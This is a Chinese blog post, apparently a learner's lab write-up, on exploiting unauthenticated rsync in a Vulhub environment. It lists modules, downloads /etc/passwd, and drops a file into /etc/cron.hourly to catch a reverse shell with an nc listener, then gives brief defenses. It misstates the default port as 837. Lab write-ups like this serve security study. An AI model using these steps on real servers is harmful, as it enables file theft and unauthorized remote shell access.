未授权访问:Rsync 未授权访问漏洞

最新推荐文章于 2025-05-02 19:07:40 发布
最新推荐文章于 2025-05-02 19:07:40 发布
阅读量1.5k 收藏 14
点赞数 9
分类专栏: 安全 未授权访问 文章标签: 网络 安全 web安全 rsync 文件上传 网络安全 未授权访问
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_68163788/article/details/138451312
版权

目录

1、漏洞原理

2、环境搭建

3、未授权访问

4、利用rsync下载任意文件

5、利用rsync反弹shell

防御手段

今天继续学习各种未授权访问的知识和相关的实操实验,一共有好多篇,内容主要是参考先知社区的一位大佬的关于未授权访问的好文章,还有其他大佬总结好的文章:

这里附上大佬的好文章链接:常见未授权访问漏洞总结 - 先知社区

我在这只是学习大佬总结好的相关的知识和实操实验,那么废话不多说,开整。

第九篇是关于Rsync的未授权访问

1、漏洞原理

Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。

Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为 837。

2、环境搭建

#利用DownGit下载https://github.com/vulhub/vulhub/tree/master/rsync/common
DownGit网址:https://minhaskamal.github.io/DownGit/#/home

上传文件到靶机并进行解压

unzip common.zip

# 编译并启动docker容器

cd common/
docker-compose build && docker-compose up -d

3、未授权访问

rsync rsync://172.16.2.250:873/
rsync rsync://172.16.2.250:873/src

可以看到成功的未授权访问到了Rsync的src问价爱你

4、利用rsync下载任意文件

rsync rsync://172.16.2.250:873/src/etc/passwd ./

5、利用rsync反弹shell

下载crontab配置文件

rsync rsync://172.16.2.250:873/src/etc/crontab ./
 

写入bash并赋权 
 

vim nc
chmod 777
 

 
 

将文件上传至/etc/cron.hourly
 

rsync -av nc rsync://172.16.2.250:873/src/etc/cron.hourly
 

 

本地监听9999
 

nc -lnvp 9999
 

 

等待一会,可以看到反弹成功了。
 

 

防御手段
 

  • -账户认证:正确配置认证用户名及密码。
  • -权限控制:使用合理的权限。
  • -网络访问控制:控制接入源ip。
  • -数据加密传输等
 

到此Rsync未授权访问漏洞的基础知识也就暂时学习到这里了,后面还有很多的未授权访问知识等着我去学习,我们下次见(*^▽^*)

                

        

    

  



    



                



	

		

			

				
					
Rsync未授权访问漏洞记录(影响范围:全版本,端口:873)

				
			

			

				

					墨痕诉清风的博客
				

				

					11-24
					
					2272
					
				

			

		

		

			
				
Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为 837。...

			
		

	



                

            
              



	

		

			

				
					
漏洞挖掘】——92、Rsync未授权访问

				
			

			

				

					Fly_鹏程万里
				

				

					06-14
					
					223
					
				

			

		

		

			
				
Rsync(Remote Sync)是一个用于文件和目录同步的开源工具,广泛用于Linux和Unix系统中,它通过比较源文件和目标文件的差异只传输变化的部分,实现高效的增量备份和文件同步,Rsync默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权就会触发隐患,Rsync的默认端口为837。

			
		

	



              


  
              

                


	

		

			

				
					
rsync 未授权访问漏洞

				
			

			

				

					weixin_59086772的博客
				

				

					12-28
					
					7706
					
				

			

		

		

			
				
雨笋教育小编来分享干货了,感兴趣的可以一同探讨。

0x00前言

rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。

0x01漏洞原理

rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。

0x02漏洞危害

rsync未授权访问会造成严重的信息泄露,攻击者可以上传脚本后门文件,远程命令执行。

0x03环境搭建

docker-compose.yml


version: '2'
s

			
		

	





	

		

			

				
					
Linux-Rsync 未授权访问覆盖

					
最新发布

				
			

			

				

					m0_74849202的博客
				

				

					05-02
					
					313
					
				

			

		

		

			
				
在自己的主机上用rsync去连接远程服务器的873端口:rsync rsync://47.94.236.117:873,此命令的主要功能是连接到 IP 地址为。这里传输的格式发生变化,我们可以直接参考本机的crontab文件格式更直观,这四条命令是系统默认就有的。如果本地当前目录不存在与远程目录相同的文件或目录,会比较文件的内容和属性,只传输发生变化的部分。会对比文件内容和属性,仅更新有变化的部分。、端口为 873 的远程服务器上,同步。、端口为 873 的远程服务器,将其。:表示当前目录,即把远程的。

			
		

	



		

			
		



	

		

			

				
					
Rsync未授权访问漏洞

				
			

			

				

					qq_68186313的博客
				

				

					08-05
					
					495
					
				

			

		

		

			
				
Rsync是Liux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口。由于配置不当,导致任何人可未授权访问Syc,上传本地文件,下载服务器文件。RSyc默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync的默认端口为837且默认配置文件路径在/etc/rsync.conf。1、在fofa中搜索该资产语法如下并在Vulhub中开启靶场。2、使用命令进行链接并读取文件。6、攻击者开启nc监听相应端口。

			
		

	





	

		

			

				
					
Rsync未授权访问漏洞 *

				
			

			

				

					starhei.zxy的博客
				

				

					08-05
					
					638
					
				

			

		

		

			
				
是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口。由于配置不当,导致任何人可未授权访问rsync,上传本地文件,下载服务器文件。Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为。中搜索该资产语法如下并在Vulhub中开启靶场!且默认配置文件路径在。

			
		

	





	

		

			

				
					
rsync未授权访问漏洞

				
			

			

				

					Kevin's Blog
				

				

					08-06
					
					3565
					
				

			

		

		

			
				
文章目录一、漏洞介绍二、漏洞环境三、漏洞利用3.1 漏洞探测3.2 漏洞利用(下载任意文件)3.3 漏洞利用(提权、反弹shell)四、修复建议
一、漏洞介绍
二、漏洞环境
三、漏洞利用
3.1 漏洞探测
》》nmap扫描对方是否存在rsync服务,默认端口873,可能更改成了其它端口

》》列出目标服务器目录:(两个方法皆可)

》》查看目录中的文件,如能查看说明存在未授权访问漏洞
或者
rsync rsync://<ip>:<port>/src


3.2 漏洞利用(下载任意文件

			
		

	





	

		

			

				
					
网络未授权访问漏洞Rsync,PhpInfo)

				
			

			

				

					weixin_45840241的博客
				

				

					07-03
					
					1275
					
				

			

		

		

			
				
Rsync未授权访问漏洞是指Rsync服务配置不当或存在漏洞,导致攻击者可以未经授权访问和操作Rsync服务。Rsync是一个用于文件同步和传输的开源工具,通常在Unix/Linux系统上使用。当Rsync服务未经正确配置时,攻击者可以利用该漏洞获取敏感文件、执行恶意操作,甚至对系统进行破坏。这种漏洞通常出现在以下情况下。

			
		

	





	

		

			

				
					
每日漏洞 | rsync未授权访问

				
			

			

				

					
				

				

					03-12
					
					4086
					
				

			

		

		

			
				
每日漏洞 | rsync未授权访问

			
		

	





	

		

			

				
					
rsync未授权漏洞复现

				
			

			

				

					weixin_45006525的博客
				

				

					03-31
					
					5945
					
				

			

		

		

			
				
漏洞简介:
rsync是linux系统下的数据镜像备份工具,使用rsync可以快速增量备份数据,支持本地复制,或与其他ssh、rsync主机同步。该协议默认监听873端口,如果目标开启rsync,并且没有配置ACL或访问密码,就可以未授权读写目标服务器文件。
环境搭建:
本此环境使用docker-vulhub
进入vulhub-rsync,运行docker-compose up -d

环境搭建完成后,用nmap扫描一下,发现服务已经启动

漏洞复现
1.列出模块下的文件

2.下载任意文件
rsync r

			
		

	





	

		

			

				
					
测试rsync未授权访问漏洞及批量检测

				
			

			

				

					prcool的博客
				

				

					01-31
					
					1250
					
				

			

		

		

			
				
rsync 是 Linux 下一款数据备份工具,支持通过 rsync 协议、ssh 协议进行远程文件 传输。其中 rsync 协议默认监听 873 端口,如果目标开启了 rsync 服务,并且没有配 置 ACL 或访问密码,我们将可以读写目标服务器文件。

			
		

	





	

		

			

				
					
rsync未授权访问

				
			

			

				

					m0_65150886的博客
				

				

					01-16
					
					832
					
				

			

		

		

			
				
rsync是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口。由于配置不当,导致任何人可未授权访问rsync,上传本地文件,下载服务器文件。3.根据文件信息,可以看到src是文件根目录,可以下载任意文件,此处下载/etc/passwd到当前目录。2.权限控制,设置read only=yes,模块设置为只读;10.将shell.sh上传至/tmp/shell.sh。4.模块隐藏,设置list,将模块隐藏起来。查看src模块下的文件。

			
		

	





	

		

			

				
					
服务安全-应用协议rsync未授权&ssh漏洞复现

				
			

			

				

					网络空间安全学习
				

				

					10-16
					
					1484
					
				

			

		

		

			
				
libssh是一个在客户端和服务器端实现SSHv2协议的多平台C库。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配 置ACL或访问密码,我们将可以读写目标服务器文件。OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用户名是否存在于目标主机中。表示在每小时的第17分钟执行run-parts --report /etc/cron.hourly命令。rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。

			
		

	





	

		

			

				
					
rsync未授权访问漏洞利用复现

				
			

			

				

					技术超强的网络安全平台
				

				

					05-07
					
					1445
					
				

			

		

		

			
				
一、Rsync简介Rsync是Linux下一款数据备份工具,它在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。同时支持通过rsync协议、ssh协议进行远程文件传输。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员。其中rsync协议默认监听873端口,而一般开发人员安全意识薄弱的情况下,如果目标开启了rsync服务,并且没有配置ACL或访问密码,而rsync默认是root权限,我们将可以读写目标服务器文件。二、利用条件rsync默认允许匿名访问,也可在其配置文件中为同

			
		

	





	

		

			

				
					
漏洞复现-rsync-未授权访问】vulfocus/rsync-common

				
			

			

				

					
				

				

					10-16
					
					1631
					
				

			

		

		

			
				
rsync-未授权访问

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
未知百分百

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值